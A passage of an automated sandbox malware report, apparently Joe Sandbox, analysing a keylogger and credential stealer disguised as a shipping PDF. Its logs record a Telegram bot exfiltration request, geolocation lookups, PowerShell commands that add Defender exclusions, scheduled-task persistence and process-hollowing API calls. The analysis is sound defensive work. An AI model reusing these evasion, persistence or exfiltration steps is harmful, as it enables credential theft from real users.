                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8zIYm%2F%2FmtpDsRaKza8JCy832e264sCnjETl7jm0n%2FVCFw0HeySKU5e0O3xHzQfiXkfLRFL6zgvuWHVMfylGXlCEEYEfkgvuMIKUwUefitlnUgtSko96MkFpbYPDIqKAvQ5g%2FCme"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51a37dec7d18-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1907&min_rtt=1907&rtt_var=717&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1525600&cwnd=220&unsent_bytes=0&cid=bdf4789bc5fb2f9f&ts=463&x=0"
2024-12-14 12:50:18 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49763 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:23 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-14 12:50:24 UTC | 884 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169392
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sC59zphAbUpn%2FpV%2BRCxKhci3Ru7LJsQ0lQLPkDhT4sn6utQ4P1zHyPQvpD6%2FNGasWyk12YHuwhwkhWk%2B73m6ve7K%2BjsKqxFEPIFFwwzmKDsS%2BbM0zUTEyOl2m8Y%2FZupblsZ8Ks8w"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51c38ce47c7b-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1808&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1606160&cwnd=207&unsent_bytes=0&cid=9cb9b9b429b446ff&ts=542&x=0"
2024-12-14 12:50:24 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49765 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:26 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-14 12:50:27 UTC | 884 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:27 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169396
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJ7x%2B0Z4YBwi8kYysNuiycGLtzIAaVF%2Fg2AQLWkOUupJ5uF4%2BWm2t%2FJOd98f9OMOpzc%2BkTnMQgtze1MLJbAK8YJldtBKwdsIGTvYrKad%2BIZVfx4HKcjp%2F0enzO7yBgGAyqOGNYF4"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51d79da80f93-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1696&rtt_var=664&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1613259&cwnd=168&unsent_bytes=0&cid=4439313aeaf07be8&ts=453&x=0"
2024-12-14 12:50:27 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49767 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:29 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2024-12-14 12:50:30 UTC | 875 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169399
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D5SsfqNKpje9Kq0Bpj7Wl%2FECK%2B4H10dgLUQPubYy0yVPcDzbuA1QBg30G9tX7CFWgACgLPxRzraln7DemFSyAzorNIvx8Skb1zg5IoPKebm2Va2Sb9FhIXRsV3dIN1SuEwFKGT4X"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51eafd446a57-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2616&min_rtt=1718&rtt_var=1286&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1699650&cwnd=231&unsent_bytes=0&cid=be564bb6e17989d7&ts=452&x=0"
2024-12-14 12:50:30 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49768 | 149.154.167.220 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:31 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2016/12/2024%20/%2009:08:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-12-14 12:50:32 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:32 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 55
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-14 12:50:32 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                            Target ID:0
                                                                                                                            Start time:07:49:24
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                                                                                                                            Imagebase:0xec0000
                                                                                                                            File size:827'392 bytes
                                                                                                                            MD5 hash:8626A0C350243B5390ABF5DEE2A40641
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                                                                                                                            Imagebase:0x480000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:5
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"
                                                                                                                            Imagebase:0x480000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:7
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"
                                                                                                                            Imagebase:0xeb0000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:9
                                                                                                                            Start time:07:49:34
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                            Imagebase:0x4f0000
                                                                                                                            File size:262'432 bytes
                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:10
                                                                                                                            Start time:07:49:36
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            Imagebase:0xdc0000
                                                                                                                            File size:827'392 bytes
                                                                                                                            MD5 hash:8626A0C350243B5390ABF5DEE2A40641
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:11
                                                                                                                            Start time:07:49:37
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff717f30000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:14
                                                                                                                            Start time:07:49:45
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp"
                                                                                                                            Imagebase:0xeb0000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:15
                                                                                                                            Start time:07:49:45
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:16
                                                                                                                            Start time:07:49:45
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                            Imagebase:0x2a0000
                                                                                                                            File size:262'432 bytes
                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:17
                                                                                                                            Start time:07:49:46
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                            Imagebase:0xd40000
                                                                                                                            File size:262'432 bytes
                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Has exited:false


                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:11.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:2.1%
                                                                                                                              Total number of Nodes:292
                                                                                                                              Total number of Limit Nodes:34
7c9e678 Wow64SetThreadContext 40577->40579 40578->40533 40579->40578 40581 7ed1d82 40580->40581 40583 7c9e810 WriteProcessMemory 40581->40583 40582 7ed1db4 40583->40582 40585 7ed1ad6 40584->40585 40587 7c9e810 WriteProcessMemory 40585->40587 40586 7ed1cd0 40586->40533 40587->40586 40589 7ed1ac0 40588->40589 40591 7c9e810 WriteProcessMemory 40589->40591 40590 7ed1e1d 40590->40533 40591->40590 40593 7ed1ad6 40592->40593 40595 7c9e810 WriteProcessMemory 40593->40595 40594 7ed1cd0 40594->40533 40595->40594 40598 7ed1908 40596->40598 40597 7ed1915 40597->40533 40598->40597 40602 7c9ea98 CreateProcessA 40598->40602 40599 7ed1a32 40599->40533 40600 7ed236e 40599->40600 40601 7c9e900 ReadProcessMemory 40599->40601 40603 7c9e678 Wow64SetThreadContext 40599->40603 40601->40599 40602->40599 40603->40599 40605 7c9eb21 CreateProcessA 40604->40605 40607 7c9ece3 40605->40607 40609 7c9e1d0 ResumeThread 40608->40609 40611 7c9e201 40609->40611 40611->40533 40613 7c9e94b ReadProcessMemory 40612->40613 40615 7c9e98f 40613->40615 40615->40565 40617 7c9e6bd Wow64SetThreadContext 40616->40617 40619 7c9e705 40617->40619 40619->40565 40621 7c9e858 WriteProcessMemory 40620->40621 40623 7c9e8af 40621->40623 40625 7c9e790 VirtualAllocEx 40624->40625 40627 7c9e7cd 40625->40627 40265 7ed2648 40266 7ed27d3 40265->40266 40267 7ed266e 40265->40267 40267->40266 40270 7ed28c8 PostMessageW 40267->40270 40272 7ed28c1 PostMessageW 40267->40272 40271 7ed2934 40270->40271 40271->40267 40273 7ed2934 40272->40273 40273->40267 40274 185afb0 40278 185b098 40274->40278 40283 185b0a8 40274->40283 40275 185afbf 40279 185b0b9 40278->40279 40280 185b0dc 40278->40280 40279->40280 40281 185b2e0 GetModuleHandleW 40279->40281 40280->40275 40282 185b30d 40281->40282 40282->40275 40284 185b0dc 40283->40284 40285 185b0b9 40283->40285 40284->40275 40285->40284 40286 185b2e0 GetModuleHandleW 40285->40286 40287 185b30d 40286->40287 40287->40275 40288 185d340 40289 185d345 GetCurrentProcess 40288->40289 40291 185d3d1 
40289->40291 40292 185d3d8 GetCurrentThread 40289->40292 40291->40292 40293 185d415 GetCurrentProcess 40292->40293 40294 185d40e 40292->40294 40295 185d44b 40293->40295 40294->40293 40296 185d473 GetCurrentThreadId 40295->40296 40297 185d4a4 40296->40297 40262 185d588 40263 185d58d DuplicateHandle 40262->40263 40264 185d61e 40263->40264 40325 1854668 40326 1854672 40325->40326 40328 1854758 40325->40328 40329 185477d 40328->40329 40333 1854859 40329->40333 40337 1854868 40329->40337 40334 1854868 40333->40334 40336 185496c 40334->40336 40341 1854514 40334->40341 40339 185488f 40337->40339 40338 185496c 40338->40338 40339->40338 40340 1854514 CreateActCtxA 40339->40340 40340->40338 40342 18558f8 CreateActCtxA 40341->40342 40344 18559bb 40342->40344

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0185D3BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0185D3FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0185D438
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0185D491
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: c08489687d698e5f7a2f9a6a21054b76b7a1f67aed3b4304f1377d3d795b7dc2
                                                                                                                              • Instruction ID: ee1708362a8cef5482577896514d15c47422e59c05de7496b5e6d678756f021d
                                                                                                                              • Opcode Fuzzy Hash: c08489687d698e5f7a2f9a6a21054b76b7a1f67aed3b4304f1377d3d795b7dc2
                                                                                                                              • Instruction Fuzzy Hash: A95179B090174A8FDB54DFA9D4887DEBFF1EF88314F208459D908A7360D7346984CB65

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0185D3BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0185D3FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0185D438
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0185D491
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 3b4f9f2c34ca03f8034308648542cd5a381a9d4d91ebf4bf9c43ffdba5e5675f
                                                                                                                              • Instruction ID: c67cab57d4c21ca7498130bef2425b5197e5c121bab41158332d03e517d51d56
                                                                                                                              • Opcode Fuzzy Hash: 3b4f9f2c34ca03f8034308648542cd5a381a9d4d91ebf4bf9c43ffdba5e5675f
                                                                                                                              • Instruction Fuzzy Hash: 585158B090074A8FDB54DFA9D548BDEBFF1EF88314F208459D908A7260D7346984CB65

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C9ECCE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: 3bb63fc121cbbe001dda7a34d8e6f44b29d5cab0c21aa4115f97592ce200c2aa
                                                                                                                              • Instruction ID: f986fb82f8f3506b7c7a57c45e437c9508905491feea4b3605a7dded2e45932d
                                                                                                                              • Opcode Fuzzy Hash: 3bb63fc121cbbe001dda7a34d8e6f44b29d5cab0c21aa4115f97592ce200c2aa
                                                                                                                              • Instruction Fuzzy Hash: 8D917EB2D0021ADFDF60DF68C885BDDBBB2BF58310F1485A9D809A7280D7749A85CF91

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B2FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 018559A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 018559A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07CAC995,?,?), ref: 07CACA47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
